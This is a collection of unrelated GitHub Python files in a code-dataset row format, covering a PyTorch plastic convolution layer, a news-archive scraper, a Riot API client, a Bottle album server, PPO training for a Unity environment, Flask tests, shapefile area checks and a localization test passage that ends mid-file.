| wuheyouzi/code | PycharmProjects/dos/main.py | main.py | py | 495 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "concurrent.futures.thread.ThreadPoolExecutor",
"line_number": 19,
"usage_type": "call"
}
] |
12780519052 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
from core.modules import RNNCell, SequenceWise, ConvLayer
def im2col(x, K, P):
N, C, H, W = x.shape
L = N * H * W
CK2 = C * K ** 2
xcol = F.unfold(x, kernel_size=K, padding=P)
xcol = xcol.permute(0, 2, 1).reshape(L, CK2)
return xcol
def outer_conv(xcol, y):
N, C, H, W = y.shape
L, CK2 = xcol.shape
y = hide_spatial(y) # [L, C]
# [L, CK2, 1] x [L, 1, C] = [L, CK2, C]
delta = torch.bmm(xcol.unsqueeze(2), y.unsqueeze(1))
return delta
def local_convolution(self, xcol, w, out_shape):
L, CK2 = xcol.shape
N, C, H, W = out_shape
y = torch.bmm(xcol.unsqueeze(1), w)
return y
def show_spatial(x, N, H, W, C):
return x.reshape(N, H, W, C).permute(0, 3, 1, 2).contiguous()
def hide_spatial(x):
N, C, H, W = x.shape
L = N*H*W
return x.permute(0, 2, 3, 1).reshape(L, C)
def convolutions(x, weights, padding=1):
return torch.cat([F.conv2d(x[i:i+1], weights[i], bias=None, padding=padding) for i in range(len(x))])
class ConvPlastic(RNNCell):
r"""ConvPlasticCell module, applies sequential part of ConvRNNPlastic.
a convolutional derivation of https://arxiv.org/pdf/1804.02464.pdf
the module learns weights by applying hebbian rule convolutionally.
V1: the plastic weights are accumulated accross the receptive field (only global convolutions)
"""
def __init__(self, in_channels, hidden_dim, kernel_size=3, hard=False, local=False):
super(ConvPlastic, self).__init__(hard)
self.hidden_dim = hidden_dim
self.conv_x2h = SequenceWise(ConvLayer(in_channels, hidden_dim,
kernel_size=5,
stride=2,
dilation=1,
padding=2,
activation='Identity'))
self.K = kernel_size
self.P = kernel_size//2
self.C = hidden_dim
self.CK2 = self.C * self.K**2
# fixed part of weights
self.fixed_weights = nn.Parameter(.01 * torch.randn(self.C, self.C, self.K, self.K).float())
# fixed modulation of plastic weights
self.alpha = nn.Parameter(.01 * torch.randn(self.C, self.C, self.K, self.K).float())
self.eta = nn.Parameter( .01 * torch.ones(1).float() )
self.reset()
def forward(self, xi):
xi = self.conv_x2h(xi)
xiseq = xi.split(1, 0) # t,n,c,h,w
T, N, C, H, W = xi.shape
L = N*H*W
if self.prev_h is not None:
self.hebb = self.hebb.detach()
self.prev_h = self.prev_h.detach()
else:
self.prev_h = torch.zeros(N, C, H, W).float().to(xi)
self.hebb = torch.zeros(N, self.C, self.C, self.K, self.K).float().to(xi)
result = []
for t, xt in enumerate(xiseq):
xt = xt.squeeze(0)
self.prev_h, self.hebb = self.forward_t(xt, self.prev_h, self.hebb)
result.append(self.prev_h.unsqueeze(0))
res = torch.cat(result, dim=0)
return res
def forward_t(self, xt, hin, hebb):
weights = hebb * self.alpha.unsqueeze(0) + self.fixed_weights
hout = torch.tanh(convolutions(hin, weights) + xt)
hebb = self.update_hebbian(hin, hout, hebb)
return hout, hebb
def update_hebbian(self, hin, hout, hebb):
N, C, H, W = hout.shape
hin_col = im2col(hin, self.K, self.P)
delta = outer_conv(hin_col, hout)
delta = delta.reshape(N, H*W, self.CK2, C).mean(dim=1) # [N, CK2, C]
delta = delta.reshape(N, C, self.K, self.K, self.C).permute(0, 1, 4, 2, 3) # [N, C, C, K, K]
hebb = (hebb + self.eta * delta).clamp_(-1, 1)
return hebb
def reset(self):
self.prev_h = None
self.hebb = None
if __name__ == '__main__':
x = torch.rand(10, 5, 7, 16, 16)
net = ConvPlasticCell(7)
y = net(x)
print(y.shape) | etienne87/torch_object_rnn | core/convs/plastic_conv.py | plastic_conv.py | py | 4,185 | python | en | code | 9 | github-code | 36 | [
{
"api_name": "torch.nn.functional.unfold",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "torch.bmm",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.bmm",
... |
9747404267 | # Author: Ranjodh Singh
import requests
from bs4 import BeautifulSoup as bs
import os
url = "http://www.thehindu.com/archive/"
html = requests.get(url)
soup = bs(html.__dict__['_content'], "html5lib")
container = soup.select("#archiveTodayContainer")
for link in container[0].find_all("a"):
resp = requests.get(link['href'])
soup = bs(resp.__dict__['_content'], "html5lib")
daily_links = soup.select("[class~=ui-state-default]")
for l in daily_links:
web_link = l['href']
new_dir = "/".join(web_link.split("/")[-4:-1])
os.makedirs(new_dir)
s = bs(requests.get(web_link).__dict__['_content'], "html5lib")
news_links = s.find_all('tr')[3].find_all('td')[-2].find_all("a")
news_links = [i for i in news_links if "stories" in i['href']]
print("Fetching news from ", web_link)
for n in range(len(news_links)):
news = bs(requests.get(web_link + news_links[n]['href']).__dict__['_content'], "html5lib")
try:
headline = news.find("h3").get_text()
except:
headline = ""
with open(new_dir + "/" + str(n) + ".txt", "w") as f:
f.write(headline)
for x in news.find_all('p')[:-4]:
f.write(x.get_text())
| singhranjodh/the-hindu-archive-scraper | script.py | script.py | py | 1,304 | python | en | code | 7 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"li... |
25717533361 | from typing import Type, TypeVar, MutableMapping, Any, Iterable
from datapipelines import (
DataSource,
PipelineContext,
Query,
NotFoundError,
validate_query,
)
from .common import RiotAPIService, APINotFoundError
from ...data import Platform, Region
from ...dto.staticdata.version import VersionListDto
from ...dto.spectator import CurrentGameInfoDto, FeaturedGamesDto
from ..uniquekeys import convert_region_to_platform
T = TypeVar("T")
def _get_default_version(
query: MutableMapping[str, Any], context: PipelineContext
) -> str:
pipeline = context[PipelineContext.Keys.PIPELINE]
versions = pipeline.get(VersionListDto, {"platform": query["platform"]})
return versions["versions"][0]
def _get_default_locale(
query: MutableMapping[str, Any], context: PipelineContext
) -> str:
return query["platform"].default_locale
class SpectatorAPI(RiotAPIService):
@DataSource.dispatch
def get(
self,
type: Type[T],
query: MutableMapping[str, Any],
context: PipelineContext = None,
) -> T:
pass
@DataSource.dispatch
def get_many(
self,
type: Type[T],
query: MutableMapping[str, Any],
context: PipelineContext = None,
) -> Iterable[T]:
pass
################
# Current Game #
################
_validate_get_current_game_query = (
Query.has("platform").as_(Platform).also.has("summoner.id").as_(str)
)
@get.register(CurrentGameInfoDto)
@validate_query(_validate_get_current_game_query, convert_region_to_platform)
def get_current_game(
self, query: MutableMapping[str, Any], context: PipelineContext = None
) -> CurrentGameInfoDto:
url = "https://{platform}.api.riotgames.com/lol/spectator/v4/active-games/by-summoner/{id}".format(
platform=query["platform"].value.lower(), id=query["summoner.id"]
)
try:
app_limiter, method_limiter = self._get_rate_limiter(
query["platform"], "spectator/active-games/by-summoner"
)
data = self._get(
url, {}, app_limiter=app_limiter, method_limiter=method_limiter
)
except APINotFoundError as error:
raise NotFoundError(str(error)) from error
data["region"] = query["platform"].region.value
data["summonerId"] = query["summoner.id"]
return CurrentGameInfoDto(data)
#################
# Featured Game #
#################
_validate_get_featured_game_query = Query.has("platform").as_(Platform)
@get.register(FeaturedGamesDto)
@validate_query(_validate_get_featured_game_query, convert_region_to_platform)
def get_featured_games(
self, query: MutableMapping[str, Any], context: PipelineContext = None
) -> FeaturedGamesDto:
url = "https://{platform}.api.riotgames.com/lol/spectator/v4/featured-games".format(
platform=query["platform"].value.lower()
)
try:
app_limiter, method_limiter = self._get_rate_limiter(
query["platform"], "featured-games"
)
data = self._get(
url, {}, app_limiter=app_limiter, method_limiter=method_limiter
)
except APINotFoundError as error:
raise NotFoundError(str(error)) from error
data["region"] = query["platform"].region.value
for game in data["gameList"]:
game["region"] = data["region"]
return FeaturedGamesDto(data)
| meraki-analytics/cassiopeia | cassiopeia/datastores/riotapi/spectator.py | spectator.py | py | 3,558 | python | en | code | 522 | github-code | 36 | [
{
"api_name": "typing.TypeVar",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "typing.MutableMapping",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "typing.Any",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "datapipelines.Pipelin... |
35940617435 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 30 16:21:28 2018
@author: bob.lee
"""
from src.model_test import image_cnn
from PIL import Image
import sys
def image_main(image_name):
image = Image.open(image_name)
image = image.flatten() / 255
predict_text = image_cnn(image)
return predict_text
if __name__ == '__main__':
result = image_main(sys.argv[1])
print(result)
| lidunwei12/Verification_code | main.py | main.py | py | 420 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "PIL.Image.open",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "src.model_test.image_cnn",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"lin... |
34717450162 | from bottle import route
from bottle import run
from bottle import request
from bottle import HTTPError
import album
@route("/albums/<artist>")
def albums(artist):
""" в переменную albums_list записываем таблицу найденных альбомов
для этого обращаемся к функции find(), которую мы написали
в модуле album
"""
albums_list=album.find(artist)
if not albums_list:
message="Альбомов {} не найдено".format(artist)
result = HTTPError(404, message)
else:
album_names = [album.album for album in albums_list]
result = "Список альбомов {} <br>".format(artist)
result += "<br>".join(album_names)
return result
@route("/albums", method="POST")
def make_album():
year = request.forms.get("year")
artist = request.forms.get("artist")
genre = request.forms.get("genre")
album_name = request.forms.get("album")
try:
year = int(year)
except ValueError:
return HTTPError(400, "Год альбома введен неверно!")
try:
new_album = album.save(year, artist, genre, album_name)
except AssertionError as err:
result = HTTPError(400, str(err))
except album.AlreadyExists as err:
result = HTTPError(409, str(err))
else:
print("Новый альбом с ID #{} успешно сохранен!".format(new_album.id))
result = "Альбом с ID #{} успешно сохранен".format(new_album.id)
return result
if __name__ == "__main__":
run(host="localhost", port=8080, debug=True) | zpa1986/-zpa1986-skillfactory-module-11-zaykin_B6-Practice | album_server.py | album_server.py | py | 1,730 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "album.find",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "bottle.HTTPError",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "album.album",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "bottle.route",
"line... |
30874171906 | import argparse
import os
import time
import gym
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
from PPO import PPO
from unity_wrapper_zzy import UnityWrapper
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=True)
parser.add_argument('--test', dest='test', action='store_true', default=False)
args = parser.parse_args()
##################### hyper parameters ####################
ENV_ID = 'CarVerification-2' # environment id
RANDOM_SEED = 1 # random seed
RENDER = True # render while training
ALG_NAME = 'PPO'
TRAIN_EPISODES = 3000 # total number of episodes for training
TEST_EPISODES = 10 # total number of episodes for testing
MAX_STEPS = 200 # total number of steps for each episode
# GAMMA = 0.9 # reward discount
# LR_A = 0.00001 # learning rate for actor0.00001
# LR_C = 0.00002 # learning rate for critic0.0005
BATCH_SIZE = 32 # update batch size
# ACTOR_UPDATE_STEPS = 10 # actor update steps
# CRITIC_UPDATE_STEPS = 10 # critic update steps
#
# # ppo-penalty parameters
# KL_TARGET = 0.01
# LAM = 0.5
#
# # ppo-clip parameters
# EPSILON = 0.2
LogDir = os.path.join("logs/"+ENV_ID)
if __name__ == '__main__':
if RENDER: # 流畅渲染,看训练效果
env = UnityWrapper(train_mode=False, base_port=5004)
else:
env = UnityWrapper(train_mode=True, base_port=5004)
obs_shape_list, d_action_dim, c_action_dim = env.init()
print("obs_shape_list", obs_shape_list)
print("d_action_dim:", d_action_dim)
print("c_action_dim:", c_action_dim)
agent = PPO(obs_shape_list[0], d_action_dim, c_action_dim, 1)
t0 = time.time()
if args.train:
summary_writer = tf.summary.create_file_writer(LogDir)
all_episode_reward = []
for episode in range(TRAIN_EPISODES):
obs_list = env.reset()
state = obs_list[0][0]
# print("state:", state)
# print("state_dim:", state.shape)
# print("type_state:", type(state))
n_agents = obs_list[0].shape[0]
# print("n_agent:", n_agents)
episode_reward = 0
for step in range(MAX_STEPS): # in one episode
if d_action_dim != 0: # 离散动作
d_action = agent.get_action(state, d_action_dim)
# print("d_action:", d_action) # d_action: [3]
d_action_to_unity = np.eye(d_action_dim, dtype=np.int32)[d_action]
# print("d_action_toUnity:", d_action_to_unity)
obs_list, reward, done, max_step = env.step(d_action_to_unity, None)
agent.store_transition(state, d_action, reward)
else: # 连续动作
c_action = agent.get_action(state, d_action_dim)
# print("c_action:", c_action) # c_action: [1. 1.]
# print("type_c_action:", type(c_action))
c_action_to_unity = c_action[np.newaxis, :]
# print("c_action_to_unity", c_action_to_unity)
obs_list, reward, done, max_step = env.step(None, c_action_to_unity)
# print("obs_list", obs_list)
# print("reward:", reward) # [0.]
agent.store_transition(state, c_action, reward)
# print("state_buffer:", agent.state_buffer)
# print("length:", len(agent.state_buffer))
# print("action_buffer:", agent.action_buffer)
# print("len:", len(agent.action_buffer))
# print("reward_buffer:", agent.reward_buffer)
# print("len:", len(agent.reward_buffer))
state = obs_list[0][0] # state=state_
episode_reward += reward[0]
# update ppo
if len(agent.state_buffer) >= BATCH_SIZE:
agent.finish_path(obs_list[0][0], done)
agent.update(d_action_dim)
if done:
break
agent.finish_path(obs_list[0][0], done)
print(
'Training | Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
episode + 1, TRAIN_EPISODES, episode_reward, time.time() - t0)
)
if episode == 0:
all_episode_reward.append(episode_reward)
else:
all_episode_reward.append(all_episode_reward[-1] * 0.9 + episode_reward * 0.1)
with summary_writer.as_default(): # 希望使用的记录器
tf.summary.scalar('reward', episode_reward, step=episode)
agent.save(ALG_NAME, ENV_ID)
plt.plot(all_episode_reward)
if not os.path.exists('image'):
os.makedirs('image')
plt.savefig(os.path.join('image', '_'.join([ALG_NAME, ENV_ID])))
if args.test:
# test
agent.load(ALG_NAME, ENV_ID)
average_success_rate = 0
for episode in range(TEST_EPISODES):
obs_list = env.reset()
state = obs_list[0][0]
# print("state:", state)
# print("state_dim:", state.shape)
n_agents = obs_list[0].shape[0]
episode_reward = 0
success_tag = 0
for step in range(MAX_STEPS):
if d_action_dim != 0: # 离散动作
d_action = agent.get_action(state, d_action_dim)
# print("d_action:", d_action) # d_action: [3]
d_action_to_unity = np.eye(d_action_dim, dtype=np.int32)[d_action]
# print("d_action_toUnity:", d_action_to_unity)
obs_list, reward, done, max_step = env.step(d_action_to_unity, None)
if done:
success_tag += 1
state = obs_list[0][0]
episode_reward += reward[0]
else: # 连续动作
c_action = agent.get_action(state, d_action_dim)
# print("c_action:", c_action) # c_action: [1. 1.]
# print("type_c_action:", type(c_action))
c_action_to_unity = c_action[np.newaxis, :]
# print("c_action_to_unity", c_action_to_unity)
obs_list, reward, done, max_step = env.step(None, c_action_to_unity)
if done:
success_tag += 1
state = obs_list[0][0] # state=state_
episode_reward += reward[0]
if done:
break
print("success:", success_tag)
average_success_rate += success_tag
print(
'Testing | Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
episode + 1, TEST_EPISODES, episode_reward,
time.time() - t0))
print('Testing | Average Success Rate: {}'.format(
average_success_rate/TEST_EPISODES)) | TreeletZhang/CarVerification | main.py | main.py | py | 7,123 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 40,
"usage_type": "attribute"
},
{
"api_name": "unity_wrapper_zzy.U... |
31414356277 | """Module test user information reource."""
import json
from unittest import mock
from flask import Response
from .base_test import BaseTestCase, Center, Cohort, Society
from api.utils.marshmallow_schemas import basic_info_schema
def info_mock(status_code, society=None, location=None, cohort=None, data=None):
"""Mock reponses from api calls to ANDELA API."""
data = {} if not data else data
api_response = Response()
api_response.json = lambda: data
api_response.status_code = status_code
return cohort, location, api_response
class UserInformationTestCase(BaseTestCase):
"""Test get user information reource."""
def setUp(self):
"""Set up patch information for every test."""
BaseTestCase.setUp(self)
self.nairobi.save()
self.cohort_12_Ke.save()
self.successops_role.save()
self.society = Society(name="iStelle")
self.society.cohorts.append(self.cohort_12_Ke)
self.society.save()
self.successops_token = {"Authorization":
self.generate_token(
self.test_successops_payload)}
cohort = self.cohort_12_Ke
self.patcher = mock.patch('api.services.auth.helpers.add_extra_user_info',
return_value=info_mock(200,
location=self.nairobi,
cohort=cohort,
society=self.society))
self.patcher.start()
def test_get_user_info_saved_in_DB(self):
"""Test retrive saved information sucesfully."""
self.cohort_1_Nig.save()
self.phoenix.cohorts.append(self.cohort_1_Nig)
self.phoenix.save()
self.test_user.save()
response = self.client.get('/api/v1/users/-KdQsMt2U0ixIy_-yWTSZ',
headers=self.header,
content_type='application/json')
self.assertEqual(response.status_code, 200)
response1 = self.client.get('/api/v1/users/all',
headers=self.header,
content_type='application/json')
self.assertEqual(response1.status_code, 401)
response2 = self.client.get('/api/v1/users/all',
headers=self.successops_token,
content_type='application/json')
self.assertEqual(response2.status_code, 200)
response_data = json.loads(response.data)
expected_location_data, _ = basic_info_schema.dump(self.lagos)
self.assertDictEqual(response_data.get('data').get('location'),
expected_location_data)
expected_society_data, _ = basic_info_schema.dump(self.phoenix)
self.assertDictEqual(response_data.get('data').get('society'),
expected_society_data)
expected_cohort_data, _ = basic_info_schema.dump(self.cohort_1_Nig)
self.assertDictEqual(response_data.get('data').get('cohort'),
expected_cohort_data)
def test_get_user_info_not_saved_in_DB(self):
"""Test retrive user info from ANDELA API sucesfully."""
mock_location = Center(name='Mock-location')
mock_location.save()
mock_cohort = Cohort(name="mock_cohort", center=mock_location)
mock_cohort.save()
mock_society = Society(name="Mock-society")
mock_society.cohorts.append(mock_cohort)
mock_society.save()
# build mock reponse
user_mock_response = {
'email': "mock.user.societies@andela.com",
'first_name': "mock_user",
'id': "-Krwrwahorgt-mock-user-id",
'last_name': "mock_user",
'picture': "https://www.link.com/picture_id",
'location': {'id': mock_location.uuid},
'cohort': {'id': mock_cohort.uuid},
'roles': {
"Andelan": "-Ktest_andelan_id",
"Fellow": "-KXGy1EB1oimjQgFim6C"
}
}
patcher = mock.patch('api.endpoints.users.users.add_extra_user_info',
return_value=info_mock(200,
society=mock_society,
location=mock_location,
cohort=mock_cohort,
data=user_mock_response))
patcher.start()
response = self.client.get('/api/v1/users/-Krwrwahorgt-mock-user-id',
headers=self.header,
content_type='application/json')
self.assertEqual(response.status_code, 200)
response_data = json.loads(response.data)
expected_location_data, _ = basic_info_schema.dump(mock_location)
self.assertDictEqual(response_data.get('data').get('location'),
expected_location_data)
expected_society_data, _ = basic_info_schema.dump(mock_society)
self.assertDictEqual(response_data.get('data').get('society'),
expected_society_data)
expected_cohort_data, _ = basic_info_schema.dump(mock_cohort)
self.assertDictEqual(response_data.get('data').get('cohort'),
expected_cohort_data)
patcher.stop()
@mock.patch('api.endpoints.users.users.add_extra_user_info',
return_value=info_mock(404, data={"error": "user not found"}))
def test_get_user_info_404(self, mocked_func):
"""Test handles user not found."""
response = self.client.get('/api/v1/users/-KoJA5HXKK5nVeIdc2Sv',
headers=self.header,
content_type='application/json')
self.assertEqual(response.status_code, 404)
response_data = json.loads(response.data)
self.assertDictEqual(response_data, {"error": "user not found"})
@mock.patch('api.endpoints.users.users.add_extra_user_info',
return_value=info_mock(503, data={"Error": "Network Error"}))
def test_get_user_info_503(self, mocked_func):
"""Test handles failed network connection correctly."""
response = self.client.get('/api/v1/users/-KoJA5HXKK5nVeIdc2Sv',
headers=self.header,
content_type='application/json')
self.assertEqual(response.status_code, 503)
response_data = json.loads(response.data)
self.assertDictEqual(response_data, {"Error": "Network Error"})
@mock.patch('api.endpoints.users.users.add_extra_user_info',
return_value=info_mock(500,
data={"Error": "Something went wrong"}))
def test_get_user_info_500(self, mocked_func):
"""Test handles unexpected API issues correctly."""
response = self.client.get('/api/v1/users/-KoJA5HXKK5nVeIdc2Sv',
headers=self.header,
content_type='application/json')
self.assertEqual(response.status_code, 500)
response_data = json.loads(response.data)
self.assertDictEqual(response_data, {"Error": "Something went wrong"})
| andela/andela-societies-backend | src/tests/test_user_information.py | test_user_information.py | py | 7,480 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.Response",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "base_test.BaseTestCase",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "base_test.BaseTestCase.setUp",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "ba... |
20593599782 | # coding:utf-8
"""
Create by Wangmeng Song
July 21,2017
"""
import shapefile as sf
from shapely.geometry import Polygon, Point
import os
import inspect
import numpy as np
import json
filedir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + "/" + "area"
pingchearea = u'pincheArea.dbf' # 拼车的区域,已更新
westoutside = u'area26.dbf' # 已变成area26
eastpick = u'area28.dbf' # area28
westpick = u'area27.dbf' # area27
# 成都
chengdujieji = u'zhuanchejieji.dbf'
chengdusongji = u'zhuanchesongji.dbf'
# 宜宾
yibing = ''
# 绵阳
mianyang = ''
# 重庆
chongqing = ''
# 西安
xian = ''
# 在东边的区域
ateastarray = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 27]
class SIDE:
# 不再用此排班范围
# def chengduArea(self, advanceGetOnTheCar, rmtspID, rmtspLoc, rmtspSeat):
# latfilename = filedir + "/" + schedulearea
# polys = sf.Reader(latfilename)
# polygon = polys.shapes()
# shpfilePoints = []
# for shape in polygon:
# shpfilePoints = shape.points
# polygon = Polygon(shpfilePoints)
# delindex = []
# for i in range(len(rmtspLoc)):
# lng = rmtspLoc[i][1]
# lat = rmtspLoc[i][0]
# point = Point(lng, lat)
# if polygon.contains(point):
# continue
# else:
# advanceGetOnTheCar.append(rmtspID[i]) # 去除显示区域外的订单
# delindex.append(i)
# # 删除提前上车的订单
# for deli in reversed(delindex):
# del (rmtspID[deli])
# del (rmtspLoc[deli])
# del (rmtspSeat[deli])
# 地区东边和西边的代码,地图东为1,西为2,array
def ateast(self, orderNum, arealoclist):
sideNo = np.zeros([orderNum], dtype=int)
for i in range(len(arealoclist)):
if arealoclist[i] in ateastarray:
sideNo[i] = 1
else:
sideNo[i] = 2
return sideNo
def atwest2out(self, westLoc, orderNo):
westsideNo = np.zeros([orderNo], dtype=int)
westoutfilename = filedir + "/" + westoutside
polys = sf.Reader(westoutfilename)
polygon = polys.shapes()
shpfilePoints = []
for shape in polygon:
shpfilePoints = shape.points
polygon = Polygon(shpfilePoints)
for i in range(len(westLoc)):
lng = westLoc[i][1]
lat = westLoc[i][0]
point = Point(lng, lat)
if polygon.contains(point):
westsideNo[i] = 1 # 1表示在2环到2.5环之间
else:
westsideNo[i] = 2 # 2表示在西边2环内
return westsideNo
# 判断是否在西边2环和2.5环
# def ateast2out(self, eastLoc, orderNo):
# eastsideNo = np.zeros([orderNo], dtype=int)
# eastoutfilename = filedir + "/" + eastoutside
# polys = sf.Reader(eastoutfilename)
# polygon = polys.shapes()
# shpfilePoints = []
# for shape in polygon:
# shpfilePoints = shape.points
# polygon = Polygon(shpfilePoints)
# for i in range(len(eastLoc)):
# lng = eastLoc[i][1]
# lat = eastLoc[i][0]
# point = Point(lng, lat)
# if polygon.contains(point):
# eastsideNo[i] = 1 # 1表示在2环到2.5环之间
# else:
# eastsideNo[i] = 2 # 2表示在东边2环内
# return eastsideNo
def orderinchengdutwofive(self, orderdata):
latfilename = filedir + "/" + pingchearea
polys = sf.Reader(latfilename)
polygon = polys.shapes()
shpfilePoints = []
for shape in polygon:
shpfilePoints = shape.points
polygon = Polygon(shpfilePoints)
lng = orderdata['bdlng']
lat = orderdata['bdlat']
point = Point(lng, lat)
if polygon.contains(point):
orderdata['inside'] = True
else:
orderdata['inside'] = False
jsondatar = json.dumps(orderdata, ensure_ascii=False, separators=(',', ':')).encode('utf-8')
return jsondatar
# 判断是否在同一个区域里
def judgeinarea(self, filepath, lat, lng):
polys = sf.Reader(filepath)
polygon = polys.shapes()
shpfilePoints = []
for shape in polygon:
shpfilePoints = shape.points
polygon = Polygon(shpfilePoints)
point = Point(lng, lat)
if polygon.contains(point):
return True
else:
return False
def specificitywholeChengDu(self, SpecificityOrderdata):
try:
city = SpecificityOrderdata['city']
except:
# 没有传城市编码,默认为成都
city = 510100
tripnum = SpecificityOrderdata['triptype'] # 1为接机,2为送机
lng = SpecificityOrderdata['bdlng']
lat = SpecificityOrderdata['bdlat']
# 宜宾
if city == 'YBP':
# 接机和送机类型
SpecificityOrderdata['inside'] = False
# latfilename = filedir + "/" + yibing
# if self.judgeinarea(latfilename, lat, lng):
# SpecificityOrderdata['inside'] = True
# else:
# SpecificityOrderdata['inside'] = False
# 绵阳
elif city == 510700:
SpecificityOrderdata['inside'] = True
# latfilename = filedir + "/" + mianyang
# if self.judgeinarea(latfilename, lat, lng):
# SpecificityOrderdata['inside'] = True
# else:
# SpecificityOrderdata['inside'] = False
# 重庆
elif city == 'CKG':
SpecificityOrderdata['inside'] = False
# latfilename = filedir + "/" + chongqing
# if self.judgeinarea(latfilename, lat, lng):
# SpecificityOrderdata['inside'] = True
# else:
# SpecificityOrderdata['inside'] = False
# 西安
elif city == 610100:
SpecificityOrderdata['inside'] = True
# latfilename = filedir + "/" + xian
# if self.judgeinarea(latfilename, lat, lng):
# SpecificityOrderdata['inside'] = True
# else:
# SpecificityOrderdata['inside'] = False
# 成都
elif city == 510100:
if tripnum == 1: # 1为接机
latfilename = filedir + "/" + chengdujieji
else: # 2为送机
latfilename = filedir + "/" + chengdusongji
if self.judgeinarea(latfilename, lat, lng):
SpecificityOrderdata['inside'] = True
else:
SpecificityOrderdata['inside'] = False
jsondatar = json.dumps(SpecificityOrderdata, ensure_ascii=False, separators=(',', ':')).encode('utf-8')
return jsondatar
def eastpick(self, pickpoint):
eastfile = filedir + "/" + eastpick
polys = sf.Reader(eastfile)
polygon = polys.shapes()
shpfilePoints = []
for shape in polygon:
shpfilePoints = shape.points
polygon = Polygon(shpfilePoints)
lng = pickpoint[1]
lat = pickpoint[0]
point = Point(lng, lat)
if polygon.contains(point):
return True
else:
return False
def westpick(self, pickpoint):
westfile = filedir + "/" + westpick
polys = sf.Reader(westfile)
polygon = polys.shapes()
shpfilePoints = []
for shape in polygon:
shpfilePoints = shape.points
polygon = Polygon(shpfilePoints)
lng = pickpoint[1]
lat = pickpoint[0]
point = Point(lng, lat)
if polygon.contains(point):
return True
else:
return False
| Octoberr/Auto_Schedule | recomTimeOnTheBus/eastandwestside.py | eastandwestside.py | py | 7,983 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "inspect.getfile",
"l... |
71245259624 | # -*- coding: utf-8 -*-
# pylint: disable-msg=W0403,W0603,C0111,C0103,W0142,C0301
""" partialy stolen from python locale tests ;)
requires nose (easy_install nose)
nosetests -v --with-coverage --cover-package=localization test_localization.py
"""
from django.conf import settings
settings.configure(DEBUG=True,
)
import nose
import locale
import sys
from localization import (setlocale, format, atoi, atof, _normalize,
nl_langinfo, localeconv)
OLD_LOCALE_TM = None
def setup_tm():
""" setup for date/time tests """
global OLD_LOCALE_TM
OLD_LOCALE_TM = locale.setlocale(locale.LC_TIME)
#
def tear_down_tm():
""" cleanup for date/time tests """
locale.setlocale(locale.LC_TIME, OLD_LOCALE_TM)
#
OLD_LOCALE_NUM = None
def setup_num():
""" setup for numeric tests """
global OLD_LOCALE_NUM
OLD_LOCALE_NUM = locale.setlocale(locale.LC_NUMERIC)
#
def tear_down_num():
""" cleanup for numeric tests """
locale.setlocale(locale.LC_NUMERIC, OLD_LOCALE_NUM)
#
# setup locale list and ensure that C and en comes first
CANDIDATE_LOCALES = [x[0] for x in [('C', 1), ('en', 1)]]# + list(settings.LANGUAGES)]
OLD_LOCALE_NUM = locale.setlocale(locale.LC_NUMERIC)
if sys.platform.startswith("win"):
locale.setlocale(locale.LC_NUMERIC, "en")
elif sys.platform.startswith("freebsd"):
locale.setlocale(locale.LC_NUMERIC, "en_US.US-ASCII")
else:
locale.setlocale(locale.LC_NUMERIC, "en_US")
#
# BASE FUNCTIONALITY
def test_number_format():
setlocale('en')
td = (
# w/o grouping
(("%f", 1024), '1024.000000'),
(("%f", 102), '102.000000'),
(("%f", -42), '-42.000000'),
(("%+f", -42), '-42.000000'),
(("%20.f", -42), ' -42'),
(("%+10.f", -4200), ' -4200'),
(("%-10.f", 4200),'4200 '),
# with grouping
(("%f", 1024, 1), '1,024.000000'),
(("%f", 102, 1), '102.000000'),
(("%f", -42, 1), '-42.000000'),
(("%+f", -42, 1), '-42.000000'),
(("%20.f", -42, 1), ' -42'),
(("%+10.f", -4200, 1), ' -4,200'),
(("%-10.f", 4200, 1),'4,200 '),
)
for args, res in td:
assert format(*args) == res, '%r != %r' % (format(*args), res)
#
def _set_locale(what, loc):
try:
locale.setlocale(what, loc)
except locale.Error:
locale.setlocale(what, '')
#
@nose.with_setup(setup_num, tear_down_num)
def test_conversion():
setlocale('en')
# INT
val = 123456789
